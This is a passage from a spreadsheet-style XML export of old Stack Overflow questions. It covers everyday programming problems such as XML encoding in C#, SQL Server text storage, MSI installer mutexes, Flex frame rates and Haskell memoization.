&lt;p&gt;There is at least one thing I could do to try to circumvent the problem (not start the thread suspended) but I would first like to understand the root of the failure first. Does anyone has any idea what could cause this and how to fix it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Experiences with OpenLaszlo?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a &lt;a href="http://stackoverflow.com/questions/112351/recommendations-for-starting-web-programming"&gt;related question&lt;/a&gt;, I asked about Web Development.  I came across something called &lt;a href="http://www.openlaszlo.org/"&gt;OpenLaszlo&lt;/a&gt; yesterday and thought it looked interesting for doing some website development.  The site has a bunch of good information on it and they've got some nice tutorials and such, but being a total novice (as far as web development goes), I'm wondering whether anyone here would recommend this. As I stated in my other question, this is a new world for me and there are a lot of directions I could go.  Can you compare/contrast this and other web development you've done?  Obviously, this is somewhat subjective, but I haven't heard much about it on SO and I'm hoping to get some opinions on this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>listing all functions in a python module</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a python module installed on my system and I'd like to be able to see what functions/classes/methods are available in it.   &lt;/p&gt;
&lt;p&gt;I want to call the doc function on each one. In ruby I can do something like ClassName.methods to get a list of all the methods available on that class. Is there something similar in python?&lt;/p&gt;
&lt;p&gt;eg. something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from somemodule import foo
print foo.methods # or whatever is the correct method to call
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Writing XML files using XmlTextWriter with ISO-8859-1 encoding</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having a problem writing Norwegian characters into an XML file using C#. I have a string variable containing some Norwegian text (with letters like Ã¦Ã¸Ã¥). &lt;/p&gt;
&lt;p&gt;I'm writing the XML using an XmlTextWriter, writing the contents to a MemoryStream like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MemoryStream stream = new MemoryStream();
XmlTextWriter xmlTextWriter = new XmlTextWriter(stream, Encoding.GetEncoding("ISO-8859-1"));
xmlTextWriter.Formatting = Formatting.Indented;
xmlTextWriter.WriteStartDocument(); //Start doc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I add my Norwegian text like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;xmlTextWriter.WriteCData(myNorwegianText);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I write the file to disk like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FileStream myFile = new FileStream(myPath, FileMode.Create);
StreamWriter sw = new StreamWriter(myFile);
stream.Position = 0;
StreamReader sr = new StreamReader(stream);
string content = sr.ReadToEnd();
sw.Write(content);
sw.Flush();
myFile.Flush();
myFile.Close();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now the problem is that in the file on this, all the Norwegian characters look funny.&lt;/p&gt;
&lt;p&gt;I'm probably doing the above in some stupid way. Any suggestions on how to fix it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Balanced Distribution Algorithm</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on some code for a loosely coupled cluster. To achieve optimal performance during jobs, I have the cluster remap its data each time a child enters or exits. This will eventually be made optional, but for now it performs its data balancing by default. My balancing is basically just making sure that each child never has more than the average number of files per machine, plus one. The plus one is for the remainder if the division isn't clean. And since the remainder will &lt;em&gt;always&lt;/em&gt; be less than the number of children [except 0 case, but we can exclude that], children after a balancing will have at most avg + 1.&lt;/p&gt;
&lt;p&gt;Everything seems fine, until I realized my algorithm is O(n!). Go down the list of children, find out the avg, remainder, who has too many and who has too few. For each child in the too many list, go through list, send to each child who has too few.&lt;/p&gt;
&lt;p&gt;Is there a better solution to this? I feel there must be.&lt;/p&gt;
&lt;p&gt;Edit: Here is some psuedocode to show how i derived O(n!):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach ( child in children ) {
    if ( child.dataLoad &amp;gt; avg + 1 ) {
        foreach ( child2 in children ) {
            if ( child != child2 &amp;amp;&amp;amp; child2.dataLoad &amp;lt; avg ) {
                sendLoad(child, child2)
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit: O(n^2). Foreach n, n =&gt; n*n =&gt; n^2. I guess I didn't have enough coffee this morning! ;)&lt;/p&gt;
&lt;p&gt;In the future I'd like to move to a more flexible and resilient distribution method[weights and hueristics], but for now, a uniform distribution of data works.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between TRUNCATE and DELETE in SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wrote up an answer to this question by mistake in response to a question about the difference between DROP and TRUNCATE, but I thought that it's a shame not to share so I'll post my own answer to my own question ... is that even ethical? :)&lt;/p&gt;
&lt;p&gt;Edit: If your answer is platform specific can you please indicate that.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When writing XML, is it better to hand write it, or to use a generator such as simpleXML in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have normally hand written xml like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;tag&amp;gt;&amp;lt;?= $value ?&amp;gt;&amp;lt;/tag&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Having found tools such as simpleXML, should I be using those instead? What's the advantage of doing it using a tool like that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data in a table with carriage return?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In SQL SERVER Is it possible to store data with carriage return in a table and then retrieve it back again with carriage return.&lt;/p&gt;
&lt;p&gt;Eg:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;insert into table values ('test1 
test2
test3
test4');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I retrieve it, I get the message in a line &lt;/p&gt;
&lt;p&gt;test1  test2  test3  test4&lt;/p&gt;
&lt;p&gt;The carriage return is treated as a single character.&lt;/p&gt;
&lt;p&gt;Is there way to get the carriage returns or its just the way its going to be stored?&lt;/p&gt;
&lt;p&gt;Thanks for the help guys!!!&lt;/p&gt;
&lt;p&gt;Edit: I should have explained this before. I get the data from the web development (asp .net) and I just insert it into the table. I might not be doing any data manipulation.. just insert.&lt;/p&gt;
&lt;p&gt;I return the data to the app development (C++) and may be some data or report viewer.&lt;/p&gt;
&lt;p&gt;I don't want to manipulate on the data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does the latest release May 2008 of .NET enterprise library have the updater app block?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does the latest version of the enterprise library (&lt;a href="http://msdn.microsoft.com/en-us/library/cc512464.aspx" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/cc512464.aspx&lt;/a&gt;) come with the updater application block?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there alternatives to CGI (and do I really need one)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am designing an application that is going to consist of 3-4 services that run as separate processes and are linked by a suitable IPC. The system is going to have a web interface and I want to use whatever webserver is there.&lt;/p&gt;
&lt;p&gt;The web interface should be accessed under some URL that allows to have other URLs on the same webserver doing totally different things. I'm planning to use the path below that URL to specify what the web interface should do. It has facilities for use by other applications over the net and for humans to interact with in a browser.&lt;/p&gt;
&lt;p&gt;Off the cuff, I'd work as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;make the webserver fire up a CGI process for every request it receives (like SetHandler in Apache)&lt;/li&gt;
&lt;li&gt;let the CGI connect to the IPC&lt;/li&gt;
&lt;li&gt;let it get whatever it needs from the backend services&lt;/li&gt;
&lt;li&gt;let the CGI return HTML / XML and whatever HTTP Status based on the services' answers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now, what I really want is to avoid the first two steps, or if I can't, avoid the second one, because I'm afraid that I'm wasting performance on unneccesary overhead (the requests coming from other applications might be frequent).&lt;/p&gt;
&lt;p&gt;PHP, for example, can open persistent connections to a MySQL database that survive the script's runtime and don't need to be recreated next time, though I don't know how they actually do it. Also, as I understand it, the Apache modules are loaded once when the server starts, so that might remove the first step but would tie me to Apache.&lt;/p&gt;
&lt;p&gt;So, what are good ways to hook a handler for specific URLs into different webservers? I don't want to handle the HTTP, otherwise I might just use a proxy setup to a second server, but it just seems to be so reinventing-the-wheel. If you think, CGI is fine and have examples where it handles large numbers of request of a similar structure, please let me know.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I change the Status labels in Bugzilla</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't want to change how the Status field works I just want to change the labels to
the states that the old system uses.  (the old systems consists of spreadsheets and paper :P
&lt;br&gt;
We are using 3.0&lt;/p&gt;
&lt;pre&gt;
* UNCONFIRMED  --&gt; PRELIMARY
* NEW          --&gt; DESIGN REVIEW
* ASSIGNED     --&gt; STR1
* RESOLVED     --&gt; STR2
* REOPEN
* VERIIFED     --&gt; BMR
* CLOSED       --&gt; TCG 
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Possible causes of Java VM EXCEPTION_ACCESS_VIOLATION?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When a Java VM crashes with an EXCEPTION_ACCESS_VIOLATION and produces an hs_err_pidXXX.log file, what does that indicate? The error itself is basically a null pointer exception. Is it always caused by a bug in the JVM, or are there other causes like malfunctioning hardware or software conflicts?&lt;/p&gt;
&lt;p&gt;Edit: there is a native component, this is an SWT application on win32.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where should a Subversion repository be?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should it be on the development servers or a Subversion server?&lt;/p&gt;
&lt;p&gt;I suppose this could be expanded to any client-server version control system.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Client/JS Framework for "Unsaved Data" Protection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a typical web application that is essentially a data entry application with lots of screens some of which have some degree of complexity.  We need to provide that standard capability on making sure if the user forgets to click the "Save" button before navigating away or closing their browser they get a warning and can cancel (but only when there is unsaved or dirty data).&lt;/p&gt;
&lt;p&gt;I know the basics of what I've got to do-- in fact I'm sure I've done it all before over the years (tie in to onbeforeunload, track the "dirty" state of the page, etc...) but before I embark on coding this YET AGAIN, does anyone have some suggestions for libraries already out there (free or otherwise) that will help out?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Base constructor in C# - Which gets called first?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which gets called first - the base constructor or "other stuff here"?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyExceptionClass : Exception
{
    public MyExceptionClass(string message, string extrainfo) : base(message)
    {
        //other stuff here
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Workaround for J2ME Hessian limitations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The official J2ME implementation of Hessian seems to have serious limitations : complex objects are not supported.&lt;br&gt; This limitation is not mentioned anywhere on the online documentation, but if you google "hessian j2me" you will find posts about this problem. No solutions found with google though. 
Does anyone have a solution for this problem ? Is there an alternate implementation of Hessian for J2ME ? &lt;br&gt;
I would like to avoid getting strings from Hessian and then do some JSON/XML parsing to get objects...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to store a large amount of text in a SQL server table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to store a large amount of text in a table in SQL server?&lt;/p&gt;
&lt;p&gt;Is varchar(max) reliable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NSIS get path of current installer file that is running</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an NSIS var to get the path of the currently running installer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firebug - how can I run multiline scripts or create a new JavaScript file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way in Firebug to start a new script file to apply to page?  Basically I want to do work like I'd normally do on the Firebug console but be able to to paste in multi-line functions, etc.  It doesn't seem like the console is amenable to that.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to compile .NET IL code to machine code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to distribute my .NET programs without the .NET framework. Is it possible to compile a .NET program to machine code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I test if another installation is already in progress?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assuming I'm trying to automate the installation of something on windows and I want to try to test whether another installation is in progress before attempting install. I don't have control over the installer and have to do this in the automation framework. Is there a better way to do this, some win32 api?, than just testing if msiexec is running?&lt;/p&gt;
&lt;p&gt;[Update 2]&lt;/p&gt;
&lt;p&gt;Improved the previous code I had been using to just access the mutex directly, this is a lot more reliable:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System.Threading;
[...]
/// &amp;lt;summary&amp;gt;
/// Wait (up to a timeout) for the MSI installer service to become free.
/// &amp;lt;/summary&amp;gt;
/// &amp;lt;returns&amp;gt;
/// Returns true for a successful wait, when the installer service has become free.
/// Returns false when waiting for the installer service has exceeded the timeout.
/// &amp;lt;/returns&amp;gt;
public static bool WaitForInstallerServiceToBeFree(TimeSpan maxWaitTime)
{
    // The _MSIExecute mutex is used by the MSI installer service to serialize installations
    // and prevent multiple MSI based installations happening at the same time.
    // For more info: http://msdn.microsoft.com/en-us/library/aa372909(VS.85).aspx
    const string installerServiceMutexName = "Global\\_MSIExecute";
    try
    {
        Mutex MSIExecuteMutex = Mutex.OpenExisting(installerServiceMutexName, 
            System.Security.AccessControl.MutexRights.Synchronize);
        bool waitSuccess = MSIExecuteMutex.WaitOne(maxWaitTime, false);
        MSIExecuteMutex.ReleaseMutex();
        return waitSuccess;
    }
    catch (WaitHandleCannotBeOpenedException)
    {
        // Mutex doesn't exist, do nothing
    }
    catch (ObjectDisposedException)
    {
        // Mutex was disposed between opening it and attempting to wait on it, do nothing
    }
    return true;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to avoid SSIS FTP task from failing when there are no files to download?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using SQL Server 2005, and creating ftp tasks within SSIS.  &lt;/p&gt;
&lt;p&gt;Sometimes there will be files to ftp over, sometimes not.  If there are no files, I don't want the task nor the package to fail.  I've changed the arrow going from the ftp task to the next to "completion", so the package runs through.  I've changed the allowed number of errors to 4 (because there are 4 ftp tasks, and any of the 4 directories may or may not have files).  &lt;/p&gt;
&lt;p&gt;But, when I run the package from a job in agent, it marks the job as failing.  Since this will be running every 15 minutes, I don't want a bunch of red x's in my job history, which will cause us to not see a problem when it really does occur.  &lt;/p&gt;
&lt;p&gt;How do I set the properties in the ftp task so that not finding files to ftp is not a failure?  The operation I am using is "Send files".&lt;/p&gt;
&lt;p&gt;Here is some more information: the files are on a server that I don't have any access through except ftp.  And, I don't know the filenames ahead of time.  The user can call them whatever they want.  So I can't check for specific files, nor, I think, can I check at all.  Except through using the ftp connection and tasks based upon that connection.  The files are on a remote server, and I want to copy them over to my server, to get them from that remote server.&lt;/p&gt;
&lt;p&gt;I can shell a command level ftp in a script task.  Perhaps that is what I need to use instead of a ftp task.  (I have changed to use the ftp command line, with a parameter file, called from a script task.  It gives no errors when there are no files to get.  I think this solution is going to work for me.  I'm creating the parameter file dynamically, which means I don't need to have connection information in the plain text file, but rather can be stored in my configuration file, which is in a more secure location.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are "dirty reads" safe to use in Terracotta?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;"Dirty reads", meaning reading an object's value even though it is write-locked by another thread, are &lt;a href="http://www.terracotta.org/confluence/display/howto/Recipe?recipe=dirty-read" rel="nofollow"&gt;described&lt;/a&gt; on Terracotta's website, yet I've heard that they shouldn't be used, even if you don't care about the possibility that you might get old data when you dirty-read the locked object.&lt;/p&gt;
&lt;p&gt;Does anyone have any experience of using dirty reads in Terracotta, and are they safe to use if you don't care about the possibility of reading an old value?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does Java not have block-scoped variable declarations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The following method does not work because the inner block declares a variable of the same name as one in the outer block. Apparently variables belong to the method or class in which they are declared, not to the block in which they are declared, so I therefore can't write a short little temporary block for debugging that happens to push a variable in the outer scope off into shadow just for a moment:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void methodName() {
  int i = 7;
  for (int j = 0; j &amp;lt; 10; j++) {
    int i = j * 2;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Almost every block-scoped language I've ever used supported this, including trivial little languages that I wrote interpreters and compilers for in school.  Perl can do this, as can Scheme, and even C.  Even PL/SQL supports this!&lt;/p&gt;
&lt;p&gt;What's the rationale for this design decision for Java?&lt;/p&gt;
&lt;p&gt;Edit: as somebody pointed out, Java does have block-scoping.  What's the name for the concept I'm asking about?  I wish I could remember more from those language-design classes. :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to count keywords in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best and most efficient way to count keywords in JavaScript? Basically, I'd like to take a string and get the top N words or phrases that occur in the string, mainly for the use of suggesting tags. I'm looking more for conceptual hints or links to real-life examples than actual code, but I certainly wouldn't mind if you'd like to share code as well. If there are particular functions that would help, I'd also appreciate that. &lt;/p&gt;
&lt;p&gt;Right now I think I'm at using the split() function to separate the string by spaces and then cleaning punctuation out with a regular expression. I'd also want it to be case-insensitive.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex Post Event Screen Updates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across this topic today while investigating something very strange. Doing certain things in our Flex app can cause the number of frames rendered to rocket, from 12fps to ~30fps: loaded animations start playing at high speed and the GUI starts to lock up.&lt;/p&gt;
&lt;p&gt;Since everything I've read on Flex/Flash hammers home the point "the frame rate is capped at the fps set in the top level app", it seems the only way these extra renders can be happening is due to some events causing them (no programmatic changes to the stage's framerate are done anywhere). Since it only happens when I put my update logic in the ENTER_FRAME handler, I'm trying to figure out what might be happening which to apparently causing Flex to go render-crazy.&lt;/p&gt;
&lt;p&gt;Hypothesis: something in my update function is triggering an immediate screen update, this raises another ENTER_FRAME immediately, which means my update loop gets called, which triggers another immediate screen update, ...&lt;/p&gt;
&lt;p&gt;We have Flex components used in our GUI, if this is a factor. I don't really know where to go next on this.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarifications&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When I say things speed up, there
are two ways this manifests.&lt;/li&gt;
&lt;li&gt;Firstly, my ENTER_FRAME handler gets
called far more often.&lt;/li&gt;
&lt;li&gt;Secondly, a
loaded Flash SWF with a looping
animation built in suddenly speeds
up to te point it looks silly.&lt;/li&gt;
&lt;li&gt;I am not using updateAfterEvent, I only
found this existed when researching
this problem. Apparently, some
events on Sprite subclasses
automatically call this and I wonder
if that's the root cause.&lt;/li&gt;
&lt;li&gt;I am not doing any direct messsing about with rendering at all. Background animations play automatically as they have timelines built-in from CS3 authoring, all our update function does is change the position of DisPlayObjects or add/remove them etc&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;
I added a label to my app to print out stage.frameRate, and discovered at certain times, it suddenly changes from 12 to 1000 (the maximum allowed value). While it was trivial to add a line to my ENTER_FRAME handler to reset it that's hardly a big help.
Also, even doing this, the rendering is all messed up. Certain actions (like raising an Alert popup) make it all spring back into life.
Unfortunately, I am not able to view the source of the Stage class to set a breakpoint on the setter property.&lt;/p&gt;
&lt;p&gt;That's very interesting about the Flex loading 'set to 1000fps' thing. What we have are several Flex applications which all provide a common interface. A master app is in charge of loading these modules as required through the SWFLoader class. However, the loading process already takes into account the delayed loading... when the SWF loads we then wait for the APPLICATION_COMPLETE from the SystemManager. Once this is received, shouldn't the applications completion have occurred?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>INotifyPropertyChanged property name - hardcode vs reflection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to specify a property name when using INotifyPropertyChanged?  &lt;/p&gt;
&lt;p&gt;Most examples hardcode the property name as an argument on the PropertyChanged Event.  I was thinking about using MethodBase.GetCurrentMethod.Name.Substring(4) but am a little uneasy about the reflection overhead.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript to detect whether the dropdown of a select element is visible</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a select element in a form, and I want to display something only if the dropdown is not visible.  Things I have tried:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Watching for click events, where odd clicks mean the dropdown is visible and even clicks mean the dropdown isn't.  Misses other ways the dropdown could disappear (pressing escape, tabbing to another window), and I think this could be hard to get right cross-browser.&lt;/li&gt;
&lt;li&gt;Change events, but these only are triggered when the select box's value changes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2008 source control for small teams</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work on a small web team where I am the only .NET developer currently using Visual Studio 2008 Professional to build and maintain a few web applications.  I am about to start training another member of our team so we purchased him a copy of Visual Studio 2008 Professional. I've looked into Visual Source Safe, but I'm dubious.  I don't like that is file system based.  Ideally, the system would work with SQL Server 2005 and plug into Visual Studio.   Windows based solutions are the best because of the IT environment of the organization I work for.&lt;/p&gt;
&lt;p&gt;What are my options for a source control system?&lt;/p&gt;
&lt;p&gt;(Forgive me if the answer exists in another thread.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should try...catch go inside or outside a loop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a loop that looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int i = 0; i &amp;lt; max; i++) {
    String myString = ...;
    float myNum = Float.parseFloat(myString);
    myFloats[i] = myNum;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the main content of a method whose sole purpose is to return the array of floats. I want this method to return &lt;code&gt;null&lt;/code&gt; if there is an error, so I put the loop inside a &lt;code&gt;try...catch&lt;/code&gt; block, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try {
    for (int i = 0; i &amp;lt; max; i++) {
        String myString = ...;
        float myNum = Float.parseFloat(myString);
        myFloats[i] = myNum;
    }
} catch (NumberFormatException ex) {
    return null;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But then I also thought of putting the &lt;code&gt;try...catch&lt;/code&gt; block inside the loop, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int i = 0; i &amp;lt; max; i++) {
    String myString = ...;
    try {
        float myNum = Float.parseFloat(myString);
    } catch (NumberFormatException ex) {
        return null;
    }
    myFloats[i] = myNum;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any reason, performance or otherwise, to prefer one over the other?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; The consensus seems to be that it is cleaner to put the loop inside the try/catch, possibly inside its own method. However, there is still debate on which is faster. Can someone test this and come back with a unified answer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RoR: Accessing models from with application.rb</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i am working on a simple web app which has a user model and role model (among others), and an admin section that contains many controllers. i would like to use a before_filter to check that the user of the user in the session has a 'can_access_admin' flag.&lt;/p&gt;
&lt;p&gt;i have this code in the application.rb:&lt;/p&gt;
&lt;p&gt;def check_role
  @user = session[:user]&lt;/p&gt;
&lt;p&gt;if @user.role.can_access_admin.nil? || !@user.role.can_access_admin
    render :text =&gt; "your current role does not allow access to the administration area."
    return
  end
end&lt;/p&gt;
&lt;p&gt;and then i have this code inside one of the admin controllers:&lt;/p&gt;
&lt;p&gt;class Admin::BlogsController &amp;lt; ApplicationController
  before_filter :check_role&lt;/p&gt;
&lt;p&gt;def list
    @blogList = Blog.find(:all)
  end
end&lt;/p&gt;
&lt;p&gt;and when i try to view the list action i get this error:&lt;/p&gt;
&lt;p&gt;undefined method 'role' for user...&lt;/p&gt;
&lt;p&gt;anyone know what i have to do to get the role association to be recognized in the application.rb? (note that the associations are configured correctly and the @user.role is working fine everywhere else i've tried to use it)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I read raw (CF_HTML) clipboard data in a webpage or C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I drag and drop a selection of a webpage from Firefox to HTML-Kit, HTML-Kit asks me whether I want to paste as text or HTML. If I select "text," I get this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Version:0.9
StartHTML:00000147
EndHTML:00000516
StartFragment:00000181
EndFragment:00000480
SourceURL:http://en.wikipedia.org/wiki/Herodotus
&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;
&amp;lt;!--StartFragment--&amp;gt;Additional details have been garnered from the &amp;lt;i&amp;gt;&amp;lt;a href="http://en.wikipedia.org/wiki/Suda" title="Suda"&amp;gt;Suda&amp;lt;/a&amp;gt;&amp;lt;/i&amp;gt;, an 11th-century encyclopaedia of the &amp;lt;a href="http://en.wikipedia.org/wiki/Byzantium" title="Byzantium"&amp;gt;Byzantium&amp;lt;/a&amp;gt; which likely took its information from traditional accounts.&amp;lt;!--EndFragment--&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/ms649015(VS.85).aspx" rel="nofollow"&gt;According to MSDN&lt;/a&gt;, this is "CF_HTML" formatted clipboard data. Is it the same on OS X and Linux systems? &lt;/p&gt;
&lt;p&gt;Is there any way to access this kind of detailed information (as opposed to just the plain clip fragment) in a webpage-to-webpage drag and drop operation? What about to a C# WinForms desktop application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you make a generic memoize function in Haskell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen &lt;a href="http://stackoverflow.com/questions/129877/how-do-i-write-a-generic-memoize-function"&gt;the other post about this&lt;/a&gt;, but is there a clean way of doing this in Haskell?&lt;/p&gt;
&lt;p&gt;As a 2nd part, can it also be done without making the function monadic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you compare structs for equality in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you compare two instances of structs for equality in standard C?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>KornShell (ksh) wraparound</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay, I am sure this is simple but it is driving me nuts. I recently went to work on a program where I have had to step back in time a bit and use Redhat 9. When I'm typing on the command line from a standard xterm running KornShell (ksh), and I reach the end of the line the screen slides to the right (cutting off the left side of my command) instead of wrapping the text around to a new line. This makes things difficult for me because I can't easily copy and paste from the previous command straight from the command line. I have to look at the history and paste the command from there. In case you are wondering, I do a lot of command-line awk scripts that cause the line to get quite long. &lt;/p&gt;
&lt;p&gt;Is there a way to force the command line to wrap instead of shifting visibility to the right side of the command I am typing? &lt;/p&gt;
&lt;p&gt;I have poured through man page options with no luck. &lt;/p&gt;
&lt;p&gt;I'm running:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;XFree86 4.2.99.903(174)&lt;/li&gt;
&lt;li&gt;KSH 5.2.14. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I programmatically repair (not merely compact) an Access .mdb file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a corrupt database.  If I open it in MS Access, MS Access offers to repair it, and it succeeds.&lt;/p&gt;
&lt;p&gt;How can I do that with code?   On a machine where MS Access is not installed.&lt;/p&gt;
&lt;p&gt;I know from trying it that JRO.JetEngine.CompactDatabase does NOT work.&lt;/p&gt;
&lt;p&gt;In other words, I want to do what Access or JETCOMP.exe is doing, not what JRO.JetEngine.CompactDatabase is doing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which Haskell package contains given module</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know a Haskell module name, but I can't figure out in what package it is defined. This is bad because I can't compile without a package exposing this module.&lt;/p&gt;
&lt;p&gt;Specificaly it is Text.Regex that I can't locate, but I would like to know how to solve that problem in general.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>class with valueTypes fields and boxing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm experimenting with generics and I'm trying to create structure similar to Dataset class.&lt;br&gt;
I have following code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public struct Column&amp;lt;T&amp;gt;
{
    T value;
    T originalValue;
    public bool HasChanges
    {
        get { return !value.Equals(originalValue); }
    }
    public void AcceptChanges()
    {
        originalValue = value;
    }
}
public class Record
{
    Column&amp;lt;int&amp;gt; id;
    Column&amp;lt;string&amp;gt; name;
    Column&amp;lt;DateTime?&amp;gt; someDate;
    Column&amp;lt;int?&amp;gt; someInt;
    public bool HasChanges
    {
        get
        {
            return id.HasChanges | name.HasChanges | someDate.HasChanges | someInt.HasChanges;
        }
    }
    public void AcceptChanges()
    {
        id.AcceptChanges();
        name.AcceptChanges();
        someDate.AcceptChanges();
        someInt.AcceptChanges();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Problem I have is that when I add new column I need to add it also in HasChanges property and AcceptChanges() method. This just asks for some refactoring.&lt;br&gt;
